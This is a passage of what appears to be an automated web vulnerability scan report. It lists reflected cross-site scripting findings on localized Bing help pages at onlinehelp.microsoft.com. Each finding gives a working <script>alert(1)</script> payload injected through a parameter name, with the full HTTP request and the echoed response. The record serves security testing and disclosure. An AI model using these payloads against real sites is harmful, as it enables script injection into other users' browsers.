P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:09:12 GMT
Content-Length: 47518


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
</script>0d1903e336d=161f17<script>alert(1)</script>4ee35bfebd2" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.24. http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff808535.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59969<script>alert(1)</script>b74ea867da3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/bing/ff808535.aspx?48d04%22%3E%3Cscript%3Ealert(1)%3C/script%3E0d1903e336d=1&59969<script>alert(1)</script>b74ea867da3=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: onlinehelp.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADaBQAAvZDjFKhPuPBT1oKAaSLSig!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 15:09:49 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 15:09:49 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:09:49 GMT
Content-Length: 48051


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
</script>0d1903e336d=1&59969<script>alert(1)</script>b74ea867da3=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.25. http://onlinehelp.microsoft.com/es-AR/bing/ff808535(es-AR).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /es-AR/bing/ff808535(es-AR).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6fbb"><script>alert(1)</script>e1cba46d4f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es-AR/bing/ff808535(es-AR).aspx?f6fbb"><script>alert(1)</script>e1cba46d4f6=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:19 GMT
Content-Length: 38815


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Tabla%20de%20contenido%20de%20la%20Ayuda%20de%20Bing&body=http://onlinehelp.microsoft.com/es-ar/bing/ff808535.aspx?f6fbb"><script>alert(1)</script>e1cba46d4f6=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.26. http://onlinehelp.microsoft.com/es-CL/bing/ff808535(es-CL).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /es-CL/bing/ff808535(es-CL).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 312e9"><script>alert(1)</script>c1a5e2c5a5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es-CL/bing/ff808535(es-CL).aspx?312e9"><script>alert(1)</script>c1a5e2c5a5f=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:19 GMT
Content-Length: 38811


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Tabla%20de%20contenido%20de%20la%20Ayuda%20de%20Bing&body=http://onlinehelp.microsoft.com/es-cl/bing/ff808535.aspx?312e9"><script>alert(1)</script>c1a5e2c5a5f=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.27. http://onlinehelp.microsoft.com/es-ES/bing/ff808535(es-ES).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /es-ES/bing/ff808535(es-ES).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88055"><script>alert(1)</script>f86c8dff4d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es-ES/bing/ff808535(es-ES).aspx?88055"><script>alert(1)</script>f86c8dff4d4=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:28 GMT
Content-Length: 38844


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Tabla%20de%20contenido%20de%20la%20Ayuda%20de%20Bing&body=http://onlinehelp.microsoft.com/es-es/bing/ff808535.aspx?88055"><script>alert(1)</script>f86c8dff4d4=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.28. http://onlinehelp.microsoft.com/es-MX/bing/ff808535(es-MX).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /es-MX/bing/ff808535(es-MX).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85934"><script>alert(1)</script>6b3cc1b1afd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es-MX/bing/ff808535(es-MX).aspx?85934"><script>alert(1)</script>6b3cc1b1afd=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:28 GMT
Content-Length: 39381


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Tabla%20de%20contenido%20de%20la%20Ayuda%20de%20Bing&body=http://onlinehelp.microsoft.com/es-mx/bing/ff808535.aspx?85934"><script>alert(1)</script>6b3cc1b1afd=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.29. http://onlinehelp.microsoft.com/es-US/bing/ff808535(es-US).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /es-US/bing/ff808535(es-US).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe73a"><script>alert(1)</script>c9140ebc4a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es-US/bing/ff808535(es-US).aspx?fe73a"><script>alert(1)</script>c9140ebc4a0=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:22 GMT
Content-Length: 38820


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Tabla%20de%20contenido%20de%20la%20Ayuda%20de%20Bing&body=http://onlinehelp.microsoft.com/es-us/bing/ff808535.aspx?fe73a"><script>alert(1)</script>c9140ebc4a0=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.30. http://onlinehelp.microsoft.com/et-EE/bing/ff808535(et-EE).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /et-EE/bing/ff808535(et-EE).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a9df"><script>alert(1)</script>816c42c6187 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /et-EE/bing/ff808535(et-EE).aspx?5a9df"><script>alert(1)</script>816c42c6187=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:36 GMT
Content-Length: 38038


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/et-ee/bing/ff808535.aspx?5a9df"><script>alert(1)</script>816c42c6187=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.31. http://onlinehelp.microsoft.com/eu-es/bing/ff808535(eu-es).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /eu-es/bing/ff808535(eu-es).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc30a"><script>alert(1)</script>57024e7fc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eu-es/bing/ff808535(eu-es).aspx?bc30a"><script>alert(1)</script>57024e7fc5=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:22 GMT
Content-Length: 44151


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/eu-es/bing/ff808535(en-us).aspx?bc30a"><script>alert(1)</script>57024e7fc5=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.32. http://onlinehelp.microsoft.com/fi-FI/bing/ff808535(fi-FI).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /fi-FI/bing/ff808535(fi-FI).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a572a"><script>alert(1)</script>cc2ac72ea1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fi-FI/bing/ff808535(fi-FI).aspx?a572a"><script>alert(1)</script>cc2ac72ea1c=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:09 GMT
Content-Length: 37868


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/fi-fi/bing/ff808535.aspx?a572a"><script>alert(1)</script>cc2ac72ea1c=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.33. http://onlinehelp.microsoft.com/fr-BE/bing/ff808535(fr-BE).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /fr-BE/bing/ff808535(fr-BE).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ef37"><script>alert(1)</script>960031458ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr-BE/bing/ff808535(fr-BE).aspx?4ef37"><script>alert(1)</script>960031458ec=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:27 GMT
Content-Length: 43870


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Aide%20de%20Bing&body=http://onlinehelp.microsoft.com/fr-be/bing/ff808535.aspx?4ef37"><script>alert(1)</script>960031458ec=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.34. http://onlinehelp.microsoft.com/fr-CA/bing/ff808535(fr-CA).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /fr-CA/bing/ff808535(fr-CA).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1dde"><script>alert(1)</script>759d32eba0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr-CA/bing/ff808535(fr-CA).aspx?a1dde"><script>alert(1)</script>759d32eba0f=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:25 GMT
Content-Length: 39207


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/fr-ca/bing/ff808535.aspx?a1dde"><script>alert(1)</script>759d32eba0f=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.35. http://onlinehelp.microsoft.com/fr-CH/bing/ff808535(fr-CH).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /fr-CH/bing/ff808535(fr-CH).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425ca"><script>alert(1)</script>94d4691540c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr-CH/bing/ff808535(fr-CH).aspx?425ca"><script>alert(1)</script>94d4691540c=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:28 GMT
Content-Length: 43868


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Aide%20de%20Bing&body=http://onlinehelp.microsoft.com/fr-ch/bing/ff808535.aspx?425ca"><script>alert(1)</script>94d4691540c=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.36. http://onlinehelp.microsoft.com/fr-FR/bing/ff808535(fr-FR).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /fr-FR/bing/ff808535(fr-FR).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc629"><script>alert(1)</script>a2d607f8acf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr-FR/bing/ff808535(fr-FR).aspx?bc629"><script>alert(1)</script>a2d607f8acf=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:24 GMT
Content-Length: 43868


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Aide%20de%20Bing&body=http://onlinehelp.microsoft.com/fr-fr/bing/ff808535.aspx?bc629"><script>alert(1)</script>a2d607f8acf=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.37. http://onlinehelp.microsoft.com/hr-HR/bing/ff808535(hr-HR).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /hr-HR/bing/ff808535(hr-HR).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc463"><script>alert(1)</script>4afcc612db2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

